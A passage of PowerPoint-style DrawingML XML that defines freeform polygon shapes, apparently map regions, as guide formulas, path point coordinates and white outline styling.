                  <a:gd name="T24" fmla="*/ 90 w 155"/>
                  <a:gd name="T25" fmla="*/ 7 h 158"/>
                  <a:gd name="T26" fmla="*/ 96 w 155"/>
                  <a:gd name="T27" fmla="*/ 3 h 158"/>
                  <a:gd name="T28" fmla="*/ 105 w 155"/>
                  <a:gd name="T29" fmla="*/ 25 h 158"/>
                  <a:gd name="T30" fmla="*/ 111 w 155"/>
                  <a:gd name="T31" fmla="*/ 29 h 158"/>
                  <a:gd name="T32" fmla="*/ 115 w 155"/>
                  <a:gd name="T33" fmla="*/ 35 h 158"/>
                  <a:gd name="T34" fmla="*/ 118 w 155"/>
                  <a:gd name="T35" fmla="*/ 44 h 158"/>
                  <a:gd name="T36" fmla="*/ 108 w 155"/>
                  <a:gd name="T37" fmla="*/ 59 h 158"/>
                  <a:gd name="T38" fmla="*/ 107 w 155"/>
                  <a:gd name="T39" fmla="*/ 68 h 158"/>
                  <a:gd name="T40" fmla="*/ 117 w 155"/>
                  <a:gd name="T41" fmla="*/ 79 h 158"/>
                  <a:gd name="T42" fmla="*/ 117 w 155"/>
                  <a:gd name="T43" fmla="*/ 88 h 158"/>
                  <a:gd name="T44" fmla="*/ 123 w 155"/>
                  <a:gd name="T45" fmla="*/ 87 h 158"/>
                  <a:gd name="T46" fmla="*/ 135 w 155"/>
                  <a:gd name="T47" fmla="*/ 97 h 158"/>
                  <a:gd name="T48" fmla="*/ 143 w 155"/>
                  <a:gd name="T49" fmla="*/ 104 h 158"/>
                  <a:gd name="T50" fmla="*/ 143 w 155"/>
                  <a:gd name="T51" fmla="*/ 110 h 158"/>
                  <a:gd name="T52" fmla="*/ 141 w 155"/>
                  <a:gd name="T53" fmla="*/ 120 h 158"/>
                  <a:gd name="T54" fmla="*/ 146 w 155"/>
                  <a:gd name="T55" fmla="*/ 123 h 158"/>
                  <a:gd name="T56" fmla="*/ 148 w 155"/>
                  <a:gd name="T57" fmla="*/ 127 h 158"/>
                  <a:gd name="T58" fmla="*/ 148 w 155"/>
                  <a:gd name="T59" fmla="*/ 132 h 158"/>
                  <a:gd name="T60" fmla="*/ 155 w 155"/>
                  <a:gd name="T61" fmla="*/ 138 h 158"/>
                  <a:gd name="T62" fmla="*/ 155 w 155"/>
                  <a:gd name="T63" fmla="*/ 139 h 158"/>
                  <a:gd name="T64" fmla="*/ 147 w 155"/>
                  <a:gd name="T65" fmla="*/ 140 h 158"/>
                  <a:gd name="T66" fmla="*/ 145 w 155"/>
                  <a:gd name="T67" fmla="*/ 141 h 158"/>
                  <a:gd name="T68" fmla="*/ 133 w 155"/>
                  <a:gd name="T69" fmla="*/ 143 h 158"/>
                  <a:gd name="T70" fmla="*/ 127 w 155"/>
                  <a:gd name="T71" fmla="*/ 153 h 158"/>
                  <a:gd name="T72" fmla="*/ 94 w 155"/>
                  <a:gd name="T73" fmla="*/ 157 h 158"/>
                  <a:gd name="T74" fmla="*/ 77 w 155"/>
                  <a:gd name="T75" fmla="*/ 149 h 158"/>
                  <a:gd name="T76" fmla="*/ 76 w 155"/>
                  <a:gd name="T77" fmla="*/ 140 h 158"/>
                  <a:gd name="T78" fmla="*/ 76 w 155"/>
                  <a:gd name="T79" fmla="*/ 134 h 158"/>
                  <a:gd name="T80" fmla="*/ 68 w 155"/>
                  <a:gd name="T81" fmla="*/ 134 h 158"/>
                  <a:gd name="T82" fmla="*/ 63 w 155"/>
                  <a:gd name="T83" fmla="*/ 127 h 158"/>
                  <a:gd name="T84" fmla="*/ 38 w 155"/>
                  <a:gd name="T85" fmla="*/ 114 h 158"/>
                  <a:gd name="T86" fmla="*/ 18 w 155"/>
                  <a:gd name="T87" fmla="*/ 104 h 158"/>
                  <a:gd name="T88" fmla="*/ 9 w 155"/>
                  <a:gd name="T89" fmla="*/ 100 h 158"/>
                  <a:gd name="T90" fmla="*/ 6 w 155"/>
                  <a:gd name="T91" fmla="*/ 93 h 158"/>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55"/>
                  <a:gd name="T139" fmla="*/ 0 h 158"/>
                  <a:gd name="T140" fmla="*/ 155 w 155"/>
                  <a:gd name="T141" fmla="*/ 158 h 158"/>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55" h="158">
                    <a:moveTo>
                      <a:pt x="0" y="79"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="37" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="143" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="143" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="143" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="146" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="148" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="148" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="148" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="155" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="155" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="146" y="140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="143"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="130" y="148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="79"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36407" name="Freeform 139"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3478" y="1884"/>
                <a:ext cx="648" cy="354"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 515 w 648"/>
                  <a:gd name="T1" fmla="*/ 309 h 354"/>
                  <a:gd name="T2" fmla="*/ 467 w 648"/>
                  <a:gd name="T3" fmla="*/ 305 h 354"/>
                  <a:gd name="T4" fmla="*/ 430 w 648"/>
                  <a:gd name="T5" fmla="*/ 304 h 354"/>
                  <a:gd name="T6" fmla="*/ 398 w 648"/>
                  <a:gd name="T7" fmla="*/ 308 h 354"/>
                  <a:gd name="T8" fmla="*/ 380 w 648"/>
                  <a:gd name="T9" fmla="*/ 323 h 354"/>
                  <a:gd name="T10" fmla="*/ 351 w 648"/>
                  <a:gd name="T11" fmla="*/ 348 h 354"/>
                  <a:gd name="T12" fmla="*/ 338 w 648"/>
                  <a:gd name="T13" fmla="*/ 342 h 354"/>
                  <a:gd name="T14" fmla="*/ 312 w 648"/>
                  <a:gd name="T15" fmla="*/ 314 h 354"/>
                  <a:gd name="T16" fmla="*/ 247 w 648"/>
                  <a:gd name="T17" fmla="*/ 293 h 354"/>
                  <a:gd name="T18" fmla="*/ 141 w 648"/>
                  <a:gd name="T19" fmla="*/ 339 h 354"/>
                  <a:gd name="T20" fmla="*/ 99 w 648"/>
                  <a:gd name="T21" fmla="*/ 326 h 354"/>
                  <a:gd name="T22" fmla="*/ 98 w 648"/>
                  <a:gd name="T23" fmla="*/ 313 h 354"/>
                  <a:gd name="T24" fmla="*/ 86 w 648"/>
                  <a:gd name="T25" fmla="*/ 306 h 354"/>
                  <a:gd name="T26" fmla="*/ 74 w 648"/>
                  <a:gd name="T27" fmla="*/ 291 h 354"/>
                  <a:gd name="T28" fmla="*/ 61 w 648"/>
                  <a:gd name="T29" fmla="*/ 268 h 354"/>
                  <a:gd name="T30" fmla="*/ 78 w 648"/>
                  <a:gd name="T31" fmla="*/ 268 h 354"/>
                  <a:gd name="T32" fmla="*/ 78 w 648"/>
                  <a:gd name="T33" fmla="*/ 251 h 354"/>
                  <a:gd name="T34" fmla="*/ 107 w 648"/>
                  <a:gd name="T35" fmla="*/ 252 h 354"/>
                  <a:gd name="T36" fmla="*/ 105 w 648"/>
                  <a:gd name="T37" fmla="*/ 233 h 354"/>
                  <a:gd name="T38" fmla="*/ 103 w 648"/>
                  <a:gd name="T39" fmla="*/ 216 h 354"/>
                  <a:gd name="T40" fmla="*/ 81 w 648"/>
                  <a:gd name="T41" fmla="*/ 213 h 354"/>
                  <a:gd name="T42" fmla="*/ 47 w 648"/>
                  <a:gd name="T43" fmla="*/ 225 h 354"/>
                  <a:gd name="T44" fmla="*/ 40 w 648"/>
                  <a:gd name="T45" fmla="*/ 221 h 354"/>
                  <a:gd name="T46" fmla="*/ 15 w 648"/>
                  <a:gd name="T47" fmla="*/ 194 h 354"/>
                  <a:gd name="T48" fmla="*/ 10 w 648"/>
                  <a:gd name="T49" fmla="*/ 163 h 354"/>
                  <a:gd name="T50" fmla="*/ 22 w 648"/>
                  <a:gd name="T51" fmla="*/ 135 h 354"/>
                  <a:gd name="T52" fmla="*/ 39 w 648"/>
                  <a:gd name="T53" fmla="*/ 126 h 354"/>
                  <a:gd name="T54" fmla="*/ 70 w 648"/>
                  <a:gd name="T55" fmla="*/ 101 h 354"/>
                  <a:gd name="T56" fmla="*/ 97 w 648"/>
                  <a:gd name="T57" fmla="*/ 105 h 354"/>
                  <a:gd name="T58" fmla="*/ 127 w 648"/>
                  <a:gd name="T59" fmla="*/ 127 h 354"/>
                  <a:gd name="T60" fmla="*/ 146 w 648"/>
                  <a:gd name="T61" fmla="*/ 128 h 354"/>
                  <a:gd name="T62" fmla="*/ 179 w 648"/>
                  <a:gd name="T63" fmla="*/ 120 h 354"/>
                  <a:gd name="T64" fmla="*/ 215 w 648"/>
                  <a:gd name="T65" fmla="*/ 125 h 354"/>
                  <a:gd name="T66" fmla="*/ 238 w 648"/>
                  <a:gd name="T67" fmla="*/ 107 h 354"/>
                  <a:gd name="T68" fmla="*/ 216 w 648"/>
                  <a:gd name="T69" fmla="*/ 92 h 354"/>
                  <a:gd name="T70" fmla="*/ 236 w 648"/>
                  <a:gd name="T71" fmla="*/ 65 h 354"/>
                  <a:gd name="T72" fmla="*/ 234 w 648"/>
                  <a:gd name="T73" fmla="*/ 51 h 354"/>
                  <a:gd name="T74" fmla="*/ 267 w 648"/>
                  <a:gd name="T75" fmla="*/ 33 h 354"/>
                  <a:gd name="T76" fmla="*/ 311 w 648"/>
                  <a:gd name="T77" fmla="*/ 21 h 354"/>
                  <a:gd name="T78" fmla="*/ 355 w 648"/>
                  <a:gd name="T79" fmla="*/ 1 h 354"/>
                  <a:gd name="T80" fmla="*/ 389 w 648"/>
                  <a:gd name="T81" fmla="*/ 14 h 354"/>
                  <a:gd name="T82" fmla="*/ 395 w 648"/>
                  <a:gd name="T83" fmla="*/ 35 h 354"/>
                  <a:gd name="T84" fmla="*/ 414 w 648"/>
                  <a:gd name="T85" fmla="*/ 40 h 354"/>
                  <a:gd name="T86" fmla="*/ 431 w 648"/>
                  <a:gd name="T87" fmla="*/ 42 h 354"/>
                  <a:gd name="T88" fmla="*/ 446 w 648"/>
                  <a:gd name="T89" fmla="*/ 49 h 354"/>
                  <a:gd name="T90" fmla="*/ 478 w 648"/>
                  <a:gd name="T91" fmla="*/ 35 h 354"/>
                  <a:gd name="T92" fmla="*/ 533 w 648"/>
                  <a:gd name="T93" fmla="*/ 123 h 354"/>
                  <a:gd name="T94" fmla="*/ 556 w 648"/>
                  <a:gd name="T95" fmla="*/ 122 h 354"/>
                  <a:gd name="T96" fmla="*/ 599 w 648"/>
                  <a:gd name="T97" fmla="*/ 130 h 354"/>
                  <a:gd name="T98" fmla="*/ 639 w 648"/>
                  <a:gd name="T99" fmla="*/ 148 h 354"/>
                  <a:gd name="T100" fmla="*/ 638 w 648"/>
                  <a:gd name="T101" fmla="*/ 167 h 354"/>
                  <a:gd name="T102" fmla="*/ 620 w 648"/>
                  <a:gd name="T103" fmla="*/ 196 h 354"/>
                  <a:gd name="T104" fmla="*/ 590 w 648"/>
                  <a:gd name="T105" fmla="*/ 210 h 354"/>
                  <a:gd name="T106" fmla="*/ 574 w 648"/>
                  <a:gd name="T107" fmla="*/ 251 h 354"/>
                  <a:gd name="T108" fmla="*/ 534 w 648"/>
                  <a:gd name="T109" fmla="*/ 257 h 354"/>
                  <a:gd name="T110" fmla="*/ 540 w 648"/>
                  <a:gd name="T111" fmla="*/ 287 h 354"/>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648"/>
                  <a:gd name="T169" fmla="*/ 0 h 354"/>
                  <a:gd name="T170" fmla="*/ 648 w 648"/>
                  <a:gd name="T171" fmla="*/ 354 h 354"/>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648" h="354">
                    <a:moveTo>
                      <a:pt x="535" y="320"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="532" y="317"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="528" y="316"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="524" y="316"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="522" y="313"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="520" y="312"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="519" y="308"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="515" y="309"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="508" y="306"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="504" y="307"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="494" y="307"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="489" y="306"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="484" y="304"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="479" y="305"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="473" y="305"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="467" y="305"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="464" y="308"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="460" y="307"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="454" y="305"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="448" y="303"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="443" y="300"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="439" y="299"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="434" y="301"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="430" y="304"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="429" y="311"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="429" y="316"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="426" y="314"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="420" y="313"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="415" y="311"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="409" y="309"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="403" y="308"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="398" y="308"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="393" y="310"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="391" y="313"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="388" y="317"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="388" y="320"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="386" y="320"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="383" y="324"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="381" y="323"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="380" y="323"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="377" y="326"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="373" y="331"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="368" y="332"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="361" y="336"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="359" y="338"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="358" y="342"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="354" y="344"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="351" y="348"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="352" y="352"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="351" y="354"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="346" y="354"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="343" y="351"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="344" y="348"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="343" y="345"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="340" y="342"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="338" y="342"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="330" y="343"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="326" y="344"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="322" y="343"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="319" y="333"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="318" y="325"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="311" y="325"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="311" y="318"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="312" y="314"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="312" y="304"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="307" y="307"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="303" y="297"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="298" y="295"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="293" y="288"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="285" y="292"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="266" y="290"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="293"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="233" y="277"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="192" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="260"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="151" y="340"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="340"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="148" y="341"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="144" y="341"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="339"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="332"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="327"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="130" y="323"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="320"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="122" y="317"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="318"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="321"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="326"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="330"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="327"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="325"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="324"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="321"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="319"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="316"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="313"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="311"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="309"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="308"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="308"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="307"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="307"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="308"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="306"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="303"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="300"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="300"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="300"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="298"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="295"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="292"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="291"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="288"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="280"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="277"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="276"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="276"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="274"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="270"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="268"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="268"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="268"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="268"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="270"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="271"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="271"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="270"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="268"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="267"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="265"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="263"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="259"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="258"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="256"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="253"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="251"/>
                    </a:lnTo>
                    <a:lnTo>
